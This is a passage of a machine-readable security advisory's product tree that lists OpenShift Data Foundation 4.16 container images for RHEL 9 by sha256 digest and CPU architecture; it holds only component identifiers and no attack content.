"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le"
},
"product_reference": "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x"
},
"product_reference": "odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le"
},
"product_reference": "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64"
},
"product_reference": "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x"
},
"product_reference": "odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le"
},
"product_reference": "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64"
},
"product_reference": "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x"
},
"product_reference": "odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x"
},
"product_reference": "odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le"
},
"product_reference": "odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x"
},
"product_reference": "odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64"
},
"product_reference": "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64"
},
"product_reference": "odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x"
},
"product_reference": "odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le"
},
"product_reference": "odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64"
},
"product_reference": "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le"
},
"product_reference": "odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64 as a component of RHODF 4.16 for RHEL 9",
"product_id": "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64"
},
"product_reference": "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64",
"relates_to_product_reference": "9Base-RHODF-4.16"
},
{
"category": "default_component_of",
"full_product_name": {
